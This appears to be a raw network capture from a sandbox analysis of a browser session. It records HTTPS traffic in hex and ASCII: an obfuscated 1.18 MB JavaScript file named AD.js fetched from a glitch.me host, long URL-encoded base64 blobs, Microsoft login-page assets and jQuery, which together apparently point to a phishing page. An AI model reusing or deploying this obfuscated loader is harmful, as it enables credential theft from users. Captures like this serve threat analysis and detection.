                                                                                                                      Data Ascii: o.getAttributeNode("id"))&&n.value===e)return[o]}return[]}}),b.find.TAG=d.getElementsByTagName?function(e,t){return"undefined"!=typeof t.getElementsByTagName?t.getElementsByTagName(e):d.qsa?t.querySelectorAll(e):void 0}:function(e,t){var n,r=[],i=0,o=t.ge
                                                                                                                      2024-12-03 07:54:29 UTC1369INData Raw: 3b 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 79 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4d 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 32 21 3d 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 65 6e 61 62 6c 65 64 22 29 2e 6c 65 6e 67 74 68 26 26 79 2e 70 75 73 68 28 22 3a 65 6e 61 62 6c 65 64 22 2c 22 3a 64 69 73 61 62 6c 65 64 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 64 69 73 61 62 6c 65 64 3d 21 30 2c 32 21 3d 3d 65 2e 71
                                                                                                                      Data Ascii: ;t.setAttribute("type","hidden"),e.appendChild(t).setAttribute("name","D"),e.querySelectorAll("[name=d]").length&&y.push("name"+M+"*[*^$|!~]?="),2!==e.querySelectorAll(":enabled").length&&y.push(":enabled",":disabled"),a.appendChild(e).disabled=!0,2!==e.q


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      6192.168.2.44975523.21.241.834434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:29 UTC362OUTGET /AD.js HTTP/1.1
                                                                                                                      Host: branched-versed-session.glitch.me
                                                                                                                      Connection: keep-alive
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: none
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:54:29 UTC534INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:29 GMT
                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                      Content-Length: 1181731
                                                                                                                      Connection: close
                                                                                                                      x-amz-id-2: 6TJhShG5Uk19q5d7IlzqMSS5r1DJxHq4jMyy5aOZo39YhwxyC57fHXtVAMlHNLVYd/bA0F+1Twpm7qYFFYE90Q==
                                                                                                                      x-amz-request-id: 42VS819AAQTX3G56
                                                                                                                      last-modified: Fri, 29 Nov 2024 03:56:43 GMT
                                                                                                                      etag: "ca978c77df03aad4547a5b311a467078"
                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                      cache-control: no-cache
                                                                                                                      x-amz-version-id: ZhuIyOI9r7HOxo7Kt0KTQ55W8rC9koYb
                                                                                                                      accept-ranges: bytes
                                                                                                                      server: AmazonS3
                                                                                                                      2024-12-03 07:54:29 UTC15850INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 38 64 66 34 32 61 2c 5f 30 78 35 33 66 64 37 34 29 7b 76 61 72 20 5f 30 78 34 62 30 36 62 62 3d 5f 30 78 38 64 66 34 32 61 28 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 39 32 63 63 64 28 5f 30 78 35 31 39 61 64 62 2c 5f 30 78 31 62 61 34 31 37 29 7b 72 65 74 75 72 6e 20 5f 30 78 33 31 39 38 28 5f 30 78 35 31 39 61 64 62 2d 20 2d 30 78 32 61 38 2c 5f 30 78 31 62 61 34 31 37 29 3b 7d 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 32 32 63 63 66 38 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 39 32 63 63 64 28 2d 30 78 31 33 34 2c 2d 30 78 31 33 32 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 35 39 32 63 63 64 28 2d 30 78 31 34 32 2c 2d 30 78 31 35 31 29 29 2f 30 78 32 29 2b 70 61 72
                                                                                                                      Data Ascii: (function(_0x8df42a,_0x53fd74){var _0x4b06bb=_0x8df42a();function _0x592ccd(_0x519adb,_0x1ba417){return _0x3198(_0x519adb- -0x2a8,_0x1ba417);}while(!![]){try{var _0x22ccf8=parseInt(_0x592ccd(-0x134,-0x132))/0x1*(parseInt(_0x592ccd(-0x142,-0x151))/0x2)+par
                                                                                                                      2024-12-03 07:54:29 UTC534INData Raw: 25 36 46 25 36 46 25 36 46 25 34 31 25 34 42 25 34 42 25 36 31 25 35 41 25 34 36 25 35 35 25 33 39 25 36 31 25 35 35 25 34 46 25 37 30 25 33 37 25 33 30 25 34 31 25 34 43 25 35 32 25 35 32 25 35 32 25 35 31 25 34 31 25 35 35 25 35 35 25 35 35 25 35 35 25 34 31 25 34 36 25 34 36 25 34 36 25 34 36 25 34 31 25 34 32 25 35 32 25 35 32 25 35 32 25 35 31 25 34 31 25 35 35 25 35 35 25 35 35 25 35 35 25 34 31 25 34 36 25 34 36 25 34 36 25 34 36 25 34 31 25 34 32 25 35 32 25 35 31 25 35 37 25 37 38 25 35 31 25 34 34 25 36 44 25 36 37 25 34 31 25 36 46 25 36 46 25 36 46 25 36 46 25 34 31 25 34 42 25 34 42 25 34 42 25 34 42 25 34 31 25 34 33 25 36 39 25 36 39 25 36 39 25 36 37 25 34 31 25 36 46 25 36 46 25 36 46 25 36 46 25 34 31 25 34 42 25 34 42 25 34 42 25 34 42
                                                                                                                      Data Ascii: %6F%6F%6F%41%4B%4B%61%5A%46%55%39%61%55%4F%70%37%30%41%4C%52%52%52%51%41%55%55%55%55%41%46%46%46%46%41%42%52%52%52%51%41%55%55%55%55%41%46%46%46%46%41%42%52%51%57%78%51%44%6D%67%41%6F%6F%6F%6F%41%4B%4B%4B%4B%41%43%69%69%69%67%41%6F%6F%6F%6F%41%4B%4B%4B%4B
                                                                                                                      2024-12-03 07:54:29 UTC8949INData Raw: 25 34 42 25 34 42 25 34 42 25 34 31 25 34 33 25 36 39 25 36 39 25 36 39 25 36 37 25 34 31 25 36 46 25 36 46 25 36 46 25 36 46 25 34 31 25 34 42 25 34 42 25 34 42 25 34 42 25 34 31 25 34 33 25 36 39 25 36 39 25 36 39 25 36 37 25 34 31 25 36 46 25 36 46 25 36 46 25 36 46 25 34 31 25 34 42 25 34 42 25 34 42 25 34 42 25 34 31 25 34 33 25 36 39 25 36 39 25 36 39 25 36 37 25 34 31 25 36 46 25 36 46 25 34 32 25 37 41 25 35 32 25 35 31 25 34 31 25 35 35 25 35 35 25 35 35 25 35 35 25 34 31 25 34 36 25 34 36 25 34 36 25 34 36 25 34 31 25 34 32 25 35 32 25 35 32 25 35 32 25 35 31 25 34 31 25 35 35 25 35 35 25 35 35 25 35 35 25 34 31 25 34 36 25 34 36 25 34 36 25 34 37 25 36 33 25 35 35 25 34 31 25 34 36 25 34 36 25 34 31 25 34 46 25 36 31 25 34 42 25 34 31 25 34 33
                                                                                                                      Data Ascii: %4B%4B%4B%41%43%69%69%69%67%41%6F%6F%6F%6F%41%4B%4B%4B%4B%41%43%69%69%69%67%41%6F%6F%6F%6F%41%4B%4B%4B%4B%41%43%69%69%69%67%41%6F%6F%42%7A%52%51%41%55%55%55%55%41%46%46%46%46%41%42%52%52%52%51%41%55%55%55%55%41%46%46%46%47%63%55%41%46%46%41%4F%61%4B%41%43
                                                                                                                      2024-12-03 07:54:29 UTC16384INData Raw: 25 33 33 25 34 44 25 36 41 25 36 36 25 36 45 25 35 38 25 36 32 25 36 35 25 34 33 25 35 30 25 36 39 25 35 34 25 36 33 25 35 37 25 36 32 25 37 31 25 37 33 25 36 42 25 36 41 25 36 36 25 36 39 25 36 31 25 34 43 25 36 36 25 33 34 25 36 36 25 34 44 25 37 32 25 34 38 25 33 39 25 33 32 25 36 33 25 32 46 25 35 33 25 37 33 25 36 45 25 35 37 25 37 36 25 34 32 25 33 39 25 37 41 25 36 31 25 35 33 25 34 44 25 33 30 25 36 31 25 34 44 25 37 36 25 34 38 25 36 31 25 37 35 25 32 42 25 35 35 25 37 31 25 35 36 25 35 34 25 33 33 25 35 34 25 36 45 25 36 41 25 34 37 25 36 33 25 36 34 25 35 34 25 37 30 25 32 46 25 34 38 25 33 33 25 37 38 25 35 30 25 36 33 25 33 36 25 36 31 25 37 41 25 34 43 25 34 41 25 36 37 25 33 34 25 33 39 25 36 31 25 33 34 25 35 30 25 37 37 25 37 36 25 33 38
                                                                                                                      Data Ascii: %33%4D%6A%66%6E%58%62%65%43%50%69%54%63%57%62%71%73%6B%6A%66%69%61%4C%66%34%66%4D%72%48%39%32%63%2F%53%73%6E%57%76%42%39%7A%61%53%4D%30%61%4D%76%48%61%75%2B%55%71%56%54%33%54%6E%6A%47%63%64%54%70%2F%48%33%78%50%63%36%61%7A%4C%4A%67%34%39%61%34%50%77%76%38
                                                                                                                      2024-12-03 07:54:29 UTC1514INData Raw: 34 42 25 36 43 25 36 39 25 34 42 25 36 41 25 33 33 25 35 41 25 36 39 25 34 38 25 37 37 25 36 41 25 34 33 25 35 41 25 34 45 25 33 32 25 33 33 25 33 39 25 34 42 25 36 45 25 35 34 25 37 37 25 33 33 25 34 33 25 36 37 25 32 42 25 33 37 25 32 42 25 36 43 25 36 31 25 36 43 25 34 36 25 34 41 25 35 35 25 35 39 25 34 43 25 36 46 25 34 34 25 37 38 25 34 36 25 35 32 25 33 36 25 34 45 25 36 44 25 35 36 25 34 43 25 33 34 25 36 31 25 36 38 25 36 42 25 34 38 25 33 33 25 35 32 25 32 42 25 35 36 25 35 36 25 34 34 25 33 34 25 35 31 25 36 38 25 35 38 25 35 30 25 37 39 25 32 46 25 37 30 25 35 38 25 35 31 25 35 35 25 36 34 25 36 31 25 35 34 25 36 46 25 35 31 25 36 36 25 35 31 25 36 33 25 36 33 25 35 32 25 35 35 25 35 37 25 36 39 25 35 41 25 33 35 25 32 46 25 33 34 25 36 38 25
                                                                                                                      Data Ascii: 4B%6C%69%4B%6A%33%5A%69%48%77%6A%43%5A%4E%32%33%39%4B%6E%54%77%33%43%67%2B%37%2B%6C%61%6C%46%4A%55%59%4C%6F%44%78%46%52%36%4E%6D%56%4C%34%61%68%6B%48%33%52%2B%56%56%44%34%51%68%58%50%79%2F%70%58%51%55%64%61%54%6F%51%66%51%63%63%52%55%57%69%5A%35%2F%34%68%
                                                                                                                      2024-12-03 07:54:30 UTC8459INData Raw: 25 36 32 25 36 33 25 37 34 25 35 35 25 32 46 25 35 36 25 35 38 25 33 33 25 34 32 25 33 31 25 36 42 25 36 35 25 33 30 25 33 32 25 36 44 25 37 34 25 37 37 25 37 34 25 36 41 25 36 32 25 36 39 25 37 30 25 37 30 25 36 36 25 34 35 25 34 44 25 36 33 25 35 39 25 33 36 25 36 39 25 37 36 25 34 42 25 36 34 25 34 37 25 33 38 25 35 33 25 37 39 25 35 41 25 32 42 25 33 38 25 33 31 25 34 46 25 33 31 25 37 41 25 37 38 25 35 38 25 34 41 25 34 37 25 37 36 25 33 33 25 36 41 25 35 37 25 35 30 25 33 31 25 35 38 25 33 33 25 37 32 25 34 32 25 33 39 25 35 41 25 33 30 25 37 35 25 36 35 25 37 30 25 34 43 25 33 34 25 37 30 25 36 39 25 34 42 25 32 46 25 36 35 25 36 46 25 36 32 25 37 38 25 35 38 25 34 33 25 34 34 25 36 41 25 36 35 25 34 42 25 33 38 25 35 35 25 36 32 25 37 38 25 37 41
                                                                                                                      Data Ascii: %62%63%74%55%2F%56%58%33%42%31%6B%65%30%32%6D%74%77%74%6A%62%69%70%70%66%45%4D%63%59%36%69%76%4B%64%47%38%53%79%5A%2B%38%31%4F%31%7A%78%58%4A%47%76%33%6A%57%50%31%58%33%72%42%39%5A%30%75%65%70%4C%34%70%69%4B%2F%65%6F%62%78%58%43%44%6A%65%4B%38%55%62%78%7A
                                                                                                                      2024-12-03 07:54:30 UTC1749INData Raw: 46 25 36 46 25 36 46 25 36 46 25 34 31 25 34 42 25 34 42 25 34 42 25 34 42 25 34 31 25 34 33 25 36 39 25 36 39 25 36 39 25 36 37 25 34 31 25 36 46 25 36 46 25 36 46 25 36 46 25 34 31 25 34 42 25 34 42 25 34 42 25 34 42 25 34 31 25 34 33 25 36 39 25 36 39 25 36 39 25 36 37 25 34 31 25 36 46 25 36 46 25 36 46 25 36 46 25 34 31 25 34 42 25 34 42 25 34 42 25 34 42 25 34 31 25 34 33 25 36 39 25 36 39 25 36 39 25 36 37 25 34 31 25 36 46 25 36 46 25 36 46 25 36 46 25 34 31 25 34 42 25 34 42 25 34 42 25 34 42 25 34 31 25 34 33 25 36 39 25 36 39 25 36 39 25 36 37 25 34 31 25 36 46 25 36 46 25 36 46 25 36 46 25 34 31 25 34 42 25 34 42 25 34 42 25 34 42 25 34 31 25 34 33 25 36 39 25 36 39 25 36 39 25 36 37 25 34 31 25 36 46 25 36 46 25 36 46 25 36 46 25 34 31 25 34
                                                                                                                      Data Ascii: F%6F%6F%6F%41%4B%4B%4B%4B%41%43%69%69%69%67%41%6F%6F%6F%6F%41%4B%4B%4B%4B%41%43%69%69%69%67%41%6F%6F%6F%6F%41%4B%4B%4B%4B%41%43%69%69%69%67%41%6F%6F%6F%6F%41%4B%4B%4B%4B%41%43%69%69%69%67%41%6F%6F%6F%6F%41%4B%4B%4B%4B%41%43%69%69%69%67%41%6F%6F%6F%6F%41%4
                                                                                                                      2024-12-03 07:54:30 UTC8949INData Raw: 41 25 34 44 25 37 35 25 34 33 25 33 31 25 36 31 25 36 43 25 36 41 25 33 34 25 37 38 25 36 44 25 36 31 25 33 30 25 33 36 25 36 45 25 34 46 25 34 42 25 34 31 25 35 30 25 35 35 25 34 38 25 33 38 25 35 38 25 37 38 25 36 39 25 35 38 25 36 32 25 37 36 25 33 38 25 34 31 25 33 31 25 37 31 25 37 37 25 33 33 25 36 39 25 36 31 25 34 45 25 35 39 25 37 34 25 33 32 25 33 36 25 37 36 25 34 38 25 36 32 25 35 30 25 35 36 25 36 32 25 37 31 25 33 38 25 33 31 25 34 38 25 36 37 25 37 34 25 36 41 25 34 45 25 36 32 25 33 32 25 37 33 25 33 33 25 36 34 25 37 38 25 34 32 25 37 30 25 32 46 25 34 37 25 33 37 25 37 30 25 33 36 25 33 30 25 34 31 25 36 34 25 37 37 25 35 30 25 34 38 25 34 35 25 35 32 25 36 42 25 33 32 25 32 42 25 35 41 25 37 41 25 33 39 25 36 31 25 33 30 25 37 32 25 35
                                                                                                                      Data Ascii: A%4D%75%43%31%61%6C%6A%34%78%6D%61%30%36%6E%4F%4B%41%50%55%48%38%58%78%69%58%62%76%38%41%31%71%77%33%69%61%4E%59%74%32%36%76%48%62%50%56%62%71%38%31%48%67%74%6A%4E%62%32%73%33%64%78%42%70%2F%47%37%70%36%30%41%64%77%50%48%45%52%6B%32%2B%5A%7A%39%61%30%72%5
                                                                                                                      2024-12-03 07:54:30 UTC7435INData Raw: 44 25 35 32 25 32 46 25 34 35 25 36 31 25 34 43 25 37 41 25 35 34 25 32 42 25 33 38 25 34 38 25 33 35 25 33 31 25 37 37 25 32 46 25 36 39 25 34 46 25 33 38 25 37 35 25 34 32 25 36 32 25 35 41 25 34 37 25 33 36 25 37 35 25 34 34 25 37 36 25 33 39 25 35 39 25 37 36 25 34 39 25 35 41 25 33 32 25 37 38 25 37 35 25 36 46 25 34 31 25 32 42 25 36 37 25 37 32 25 36 32 25 37 38 25 33 33 25 34 32 25 34 42 25 36 45 25 32 42 25 37 33 25 35 38 25 33 38 25 33 36 25 34 41 25 35 30 25 34 38 25 36 42 25 34 33 25 34 45 25 32 46 25 37 32 25 34 36 25 33 39 25 34 46 25 37 34 25 36 36 25 35 30 25 36 33 25 36 36 25 36 39 25 37 35 25 32 42 25 36 39 25 35 34 25 32 46 25 36 43 25 37 30 25 35 36 25 34 46 25 33 35 25 33 38 25 36 31 25 36 31 25 36 38 25 37 36 25 33 36 25 37 39 25 35
                                                                                                                      Data Ascii: D%52%2F%45%61%4C%7A%54%2B%38%48%35%31%77%2F%69%4F%38%75%42%62%5A%47%36%75%44%76%39%59%76%49%5A%32%78%75%6F%41%2B%67%72%62%78%33%42%4B%6E%2B%73%58%38%36%4A%50%48%6B%43%4E%2F%72%46%39%4F%74%66%50%63%66%69%75%2B%69%54%2F%6C%70%56%4F%35%38%61%61%68%76%36%79%5
                                                                                                                      2024-12-03 07:54:30 UTC8949INData Raw: 25 37 30 25 35 32 25 33 35 25 34 42 25 32 42 25 36 43 25 34 31 25 34 38 25 34 39 25 33 36 25 35 36 25 33 34 25 34 38 25 36 41 25 37 33 25 37 32 25 36 36 25 34 37 25 33 30 25 35 36 25 36 45 25 32 42 25 34 39 25 35 30 25 36 38 25 37 36 25 34 38 25 36 36 25 36 45 25 33 37 25 36 44 25 36 31 25 33 37 25 32 46 25 36 31 25 35 30 25 35 31 25 36 36 25 36 43 25 35 33 25 34 37 25 34 45 25 35 37 25 33 37 25 35 35 25 34 31 25 36 35 25 36 34 25 33 36 25 34 43 25 33 38 25 34 44 25 33 30 25 37 33 25 37 41 25 33 39 25 33 30 25 35 36 25 34 41 25 37 31 25 33 33 25 37 37 25 33 35 25 35 33 25 33 34 25 32 46 25 36 38 25 32 46 25 35 33 25 37 36 25 35 31 25 34 32 25 34 35 25 37 31 25 33 39 25 37 31 25 34 37 25 36 39 25 35 36 25 37 35 25 33 31 25 34 31 25 34 38 25 36 43 25 33 38
                                                                                                                      Data Ascii: %70%52%35%4B%2B%6C%41%48%49%36%56%34%48%6A%73%72%66%47%30%56%6E%2B%49%50%68%76%48%66%6E%37%6D%61%37%2F%61%50%51%66%6C%53%47%4E%57%37%55%41%65%64%36%4C%38%4D%30%73%7A%39%30%56%4A%71%33%77%35%53%34%2F%68%2F%53%76%51%42%45%71%39%71%47%69%56%75%31%41%48%6C%38


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      7192.168.2.449757152.199.21.1754434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:29 UTC619OUTGET /shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab.gif HTTP/1.1
                                                                                                                      Host: aadcdn.msftauth.net
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:54:30 UTC716INHTTP/1.1 200 OK
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                      Age: 21142225
                                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                                      Content-MD5: tUCo5RgDcZLjLE/li/Lbqw==
                                                                                                                      Content-Type: image/gif
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:30 GMT
                                                                                                                      Etag: 0x8D79A1B9F8A840E
                                                                                                                      Last-Modified: Thu, 16 Jan 2020 00:32:52 GMT
                                                                                                                      Server: ECAcc (lhc/7929)
                                                                                                                      X-Cache: HIT
                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                      x-ms-request-id: 549bd2a0-401e-0027-800f-851a1b000000
                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                      Content-Length: 3620
                                                                                                                      Connection: close
                                                                                                                      2024-12-03 07:54:30 UTC3620INData Raw: 47 49 46 38 39 61 60 01 03 00 f0 00 00 00 00 00 69 69 69 21 f9 04 09 05 00 00 00 21 fe 26 45 64 69 74 65 64 20 77 69 74 68 20 65 7a 67 69 66 2e 63 6f 6d 20 6f 6e 6c 69 6e 65 20 47 49 46 20 6d 61 6b 65 72 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 1f 69 19 07 ec 96 8a b2 51 34 af de bc fb 0f 86 e2 48 96 e6 89 a6 6a 0a 3d 99 6b 39 2d 35 5f f5 8a e7 fa ce f7 fe 0f 8c b4 6a 37 98 a6 28 7b 05 97 cc a6 f3 09 d5 15 00 00 21 f9 04 09 03 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 0f
                                                                                                                      Data Ascii: GIF89a`iii!!&Edited with ezgif.com online GIF maker!NETSCAPE2.0,`6PlHI:qJk`BYL*&!,`9iQ4Hj=k9-5_j7({!,`9


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      8192.168.2.449760151.101.130.1374434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:31 UTC363OUTGET /jquery-3.3.1.slim.min.js HTTP/1.1
                                                                                                                      Host: code.jquery.com
                                                                                                                      Connection: keep-alive
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: none
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:54:31 UTC613INHTTP/1.1 200 OK
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 69917
                                                                                                                      Server: nginx
                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                      Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                      ETag: "28feccc0-1111d"
                                                                                                                      Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Age: 2327789
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:31 GMT
                                                                                                                      X-Served-By: cache-lga21982-LGA, cache-nyc-kteb1890024-NYC
                                                                                                                      X-Cache: HIT, HIT
                                                                                                                      X-Cache-Hits: 1402, 0
                                                                                                                      X-Timer: S1733212472.703795,VS0,VE1
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      2024-12-03 07:54:31 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 2d 61 6a 61 78 2c 2d 61 6a 61 78 2f 6a 73 6f 6e 70 2c 2d 61 6a 61 78 2f 6c 6f 61 64 2c 2d 61 6a 61 78 2f 70 61 72 73 65 58 4d 4c 2c 2d 61 6a 61 78 2f 73 63 72 69 70 74 2c 2d 61 6a 61 78 2f 76 61 72 2f 6c 6f 63 61 74 69 6f 6e 2c 2d 61 6a 61 78 2f 76 61 72 2f 6e 6f 6e 63 65 2c 2d 61 6a 61 78 2f 76 61 72 2f 72 71 75 65 72 79 2c 2d 61 6a 61 78 2f 78 68 72 2c 2d 6d 61 6e 69 70 75 6c 61 74 69 6f 6e 2f 5f 65 76 61 6c 55 72 6c 2c 2d 65 76 65 6e 74 2f 61 6a 61 78 2c 2d 65 66 66 65 63 74 73 2c 2d 65 66 66 65 63 74 73 2f 54 77 65 65 6e 2c 2d 65 66 66 65 63 74 73 2f 61 6e 69 6d 61 74 65 64 53 65 6c 65 63 74 6f 72 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e
                                                                                                                      Data Ascii: /*! jQuery v3.3.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other con
                                                                                                                      2024-12-03 07:54:31 UTC1378INData Raw: 74 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 77 2e 66 6e 2e 69 6e 69 74 28 65 2c 74 29 7d 2c 43 3d 2f 5e 5b 5c 73 5c 75 46 45 46 46 5c 78 41 30 5d 2b 7c 5b 5c 73 5c 75 46 45 46 46 5c 78 41 30 5d 2b 24 2f 67 3b 77 2e 66 6e 3d 77 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 6a 71 75 65 72 79 3a 78 2c 63 6f 6e 73 74 72 75 63 74 6f 72 3a 77 2c 6c 65 6e 67 74 68 3a 30 2c 74 6f 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 2e 63 61 6c 6c 28 74 68 69 73 29 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 6f 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28
                                                                                                                      Data Ascii: t){return new w.fn.init(e,t)},C=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g;w.fn=w.prototype={jquery:x,constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(
                                                                                                                      2024-12-03 07:54:31 UTC1378INData Raw: 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 63 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 69 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 66 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 64 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 70 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6d 28 65 29 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 30 3b
                                                                                                                      Data Ascii: ;return!(!e||"[object Object]"!==c.call(e))&&(!(t=i(e))||"function"==typeof(n=f.call(t,"constructor")&&t.constructor)&&d.call(n)===p)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;
